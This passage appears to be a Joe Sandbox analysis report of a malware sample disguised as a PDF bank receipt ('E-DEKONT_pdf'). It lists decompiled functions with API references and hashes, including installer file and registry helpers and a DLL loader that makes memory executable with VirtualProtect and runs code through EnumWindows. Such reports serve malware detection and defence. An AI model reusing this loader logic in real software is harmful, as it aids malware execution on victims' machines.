				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405da7
0x00405dad
0x00405db2
0x00405dbb
0x00405dbb
0x00405dc4

APIs

GetFileAttributesA.KERNELBASE(?,?,004059BA,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DA7
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DBB

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: 7f45f9ba69b867d106863cc71afb49232cba123af4407f869067be58f469fa57
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: 8DD0C972514532ABC2112728AE0C89BBF65DB54271702CA36FDA5A26B2DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405898 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405898(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x0040589e
0x004058a6
0x00000000
0x004058ac
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403383,007F9000,007F9000,007F9000,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 0040589E
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058AC

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: d432be32c0a1bb5554f51fee73349b76f5b6546a091cca3b6415829ac7b01f4f
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 4BC04C31204601AEE6106B209E08B1B7A94AF50741F15843D6546E00A0DB3C8465D92D

Uniqueness

Uniqueness Score: -1.00%

Function 6EC92BC4 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EC92BC4(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

				if( *0x6ec95024 != 0 && E6EC91B3E(_a4) == 0) {
					 *0x6ec95030 = _t86;
					if( *0x6ec95034 != 0) {
						_t86 =  *0x6ec95034;
					} else {
						E6EC93100(E6EC91BA7());
						 *0x6ec95034 = _t86;
					}
				}
				_t28 = E6EC91BAD(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6EC91B38();
					_t67 = _a4;
					_t74 =  *0x6ec95028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x6ec95028 = _t67;
					E6EC91BBE();
					_t33 = EnumWindows(??, ??); // executed
					 *0x6ec95000 = _t33;
					 *0x6ec95004 = _t74;
					if( *0x6ec95024 != 0 && E6EC91B3E( *0x6ec95028) == 0) {
						 *0x6ec95034 = _t87;
						_t87 =  *0x6ec95030;
					}
					_t75 =  *0x6ec95028;
					_a4 = _t75;
					 *0x6ec95028 =  *((intOrPtr*)(E6EC91B38() + _t75));
					_t37 = E6EC91B2A(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E6EC91BAD(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E6EC91BB8() + _a4 + _v8);
							_push(E6EC91BC8());
							if( *0x6ec95024 <= 0 || E6EC91B3E(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x6ec95034;
								_t76 = _t64 + _t78 * 4;
								 *0x6ec95034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6ec95028 == 0) {
						 *0x6ec95034 = 0;
					}
					_push( *0x6ec95004);
					E6EC92B72(_t37, _t64, _t76, _a4,  *0x6ec95000);
					return _a4;
				}
				_push(E6EC91BB8() + _a4);
				_t53 = E6EC91BC4();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E6EC91C27();
				_t80 = E6EC91C23();
				_t83 = E6EC91BC8();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6ec92bd4
0x6ec92be5
0x6ec92bf2
0x6ec92c06
0x6ec92bf4
0x6ec92bf9
0x6ec92bfe
0x6ec92bfe
0x6ec92bf2
0x6ec92c0f
0x6ec92c14
0x6ec92c1a
0x6ec92c5e
0x6ec92c5e
0x6ec92c63
0x6ec92c68
0x6ec92c6e
0x6ec92c70
0x6ec92c76
0x6ec92c83
0x6ec92c85
0x6ec92c8a
0x6ec92c97
0x6ec92caa
0x6ec92cb0
0x6ec92cb6
0x6ec92cb7
0x6ec92cbd
0x6ec92cc9
0x6ec92ccf
0x6ec92cd7
0x6ec92cd8
0x6ec92cdb
0x6ec92ce6
0x6ec92ce8
0x6ec92cf4
0x6ec92cfa
0x6ec92d02
0x6ec92d2e
0x6ec92d2f
0x6ec92d35
0x6ec92d35
0x6ec92d38
0x6ec92d39
0x6ec92d3c
0x6ec92d12
0x6ec92d12
0x6ec92d13
0x6ec92d15
0x6ec92d18
0x6ec92d1e
0x6ec92d21
0x6ec92d27
0x6ec92d2a
0x6ec92d2a
0x6ec92d02
0x6ec92ce6
0x6ec92d45
0x6ec92d47
0x6ec92d47
0x6ec92d51
0x6ec92d60
0x6ec92d6e
0x6ec92d6e
0x6ec92c25
0x6ec92c26
0x6ec92c2b
0x6ec92c2f
0x6ec92c34
0x6ec92c48
0x6ec92c49
0x6ec92c4a
0x6ec92c4c
0x6ec92c51
0x6ec92c53
0x6ec92c53
0x6ec92c56
0x6ec92c5c
0x00000000

APIs

EnumWindows.USER32(?), ref: 6EC92C83

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 3c9875c72b60bb15495071ee171bf288dfdbef85c9292042ff893cb59e8b5961
Instruction ID: 5cfc140dcb65da1820694c12e63af68cdce89c6bc61455e5ee639a2cf3fe7473
Opcode Fuzzy Hash: 3c9875c72b60bb15495071ee171bf288dfdbef85c9292042ff893cb59e8b5961
Instruction Fuzzy Hash: B041B1B2901604DFDF049FE8EA96B8937BDFB0532AF201829E5148B614F734D555EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00405E6E Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E6E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e72
0x00405e82
0x00405e8a
0x00000000
0x00405e91
0x00000000
0x00405e93

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FB,00000000,0079AD20,000000FF,0079AD20,000000FF,000000FF,00000004,00000000), ref: 00405E82

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: fbce0aff252bace43849c95ebebe2e1cda83fcc66daa53378426a8730234c3de
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: A2E0EC3221465AEBDF109F65DC00AEB7BACEB05360F004437FE95E3190D635EA219BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E3F(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e43
0x00405e53
0x00405e5b
0x00000000
0x00405e62
0x00000000
0x00405e64

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403345,00000000,00000000,00403192,000000FF,00000004,00000000,00000000,00000000), ref: 00405E53

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: a636cb505d38f976cb5b33cdadc1a4ea33a35a9b3076bf32ff3daa33d1af8648
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: F8E0B63221025AABDF109F65DC00AEB7B6CEB057E4F084436B995E2150D631E9619AE5

Uniqueness

Uniqueness Score: -1.00%

Function 6EC919C7 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6ec95014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6ec9501c, 4, 0x40, 0x6ec95034); // executed
					 *0x6ec9501c = 0xc2;
					 *0x6ec95034 = 0;
					 *0x6ec95030 = 0;
					 *0x6ec9502c = 0;
					 *0x6ec95028 = 0;
					 *0x6ec95024 = 0;
					 *0x6ec95020 = 0;
					 *0x6ec9501e = 0;
				}
				return 1;
			}

0x6ec919d0
0x6ec919d5
0x6ec919e5
0x6ec919ed
0x6ec919f4
0x6ec919fa
0x6ec91a00
0x6ec91a06
0x6ec91a0c
0x6ec91a12
0x6ec91a18
0x6ec91a18
0x6ec91a21

APIs

VirtualProtect.KERNELBASE(6EC9501C,00000004,00000040,6EC95034), ref: 6EC919E5

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cc2bf6786afb57808c19d676f31031476036e3e9f4bc1fa33234c2279916593f
Instruction ID: 1e60233cfc2316bdd8827902b5dd36b3a4f6f508c803b6199fc7cdfc4cbab587
Opcode Fuzzy Hash: cc2bf6786afb57808c19d676f31031476036e3e9f4bc1fa33234c2279916593f
Instruction Fuzzy Hash: D6F0C9B0919B80DACB18CF6897956093EF0B71F357B00652EF27ADA340D3304601ABBA

Uniqueness

Uniqueness Score: -1.00%

Function 004060BA Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BA(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406039(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060c4
0x004060cb
0x004060de
0x00000000
0x004060de
0x004060cf
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,007BDF00,007BDF00,?,007BDF00,?,00406148,?,?,-00008098,-00008098,00000002,-00008098), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 7af025afa92f6299d5ed017748240f958724f187594f0c9acf2bdd87a83aae65
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 2FD0123204020DBBDF119F909D01FAB375DAB08750F018426FE06A40A1D775D530A728

Uniqueness

Uniqueness Score: -1.00%

Function 004042FD Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042FD(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7c1f38;
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004042fd
0x00404304
0x0040430f
0x00000000
0x0040430f
0x00404315

APIs

SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040430F

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01ff8a972dc02d9d6b300943d9eb12c7c434b7691702030cc07fb77b951fcae2
Instruction ID: d5fde84f55c96a854f3b8e64bcd39996ee62205787155fcfdd86f6366728d343
Opcode Fuzzy Hash: 01ff8a972dc02d9d6b300943d9eb12c7c434b7691702030cc07fb77b951fcae2
Instruction Fuzzy Hash: 59C048B1744604BBEA208B609E49F0677A8AB90B00F64842DB640B60E1DA78E420EA2C

Uniqueness

Uniqueness Score: -1.00%

Function 00403348 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403348(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403356
0x0040335c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00403356

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 004042E6 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042E6(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x7c5f68, 0x28, _a4, "true"); // executed
				return _t2;
			}

0x004042f4
0x004042fa

APIs

SendMessageA.USER32(00000028,?,?,00404116), ref: 004042F4

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
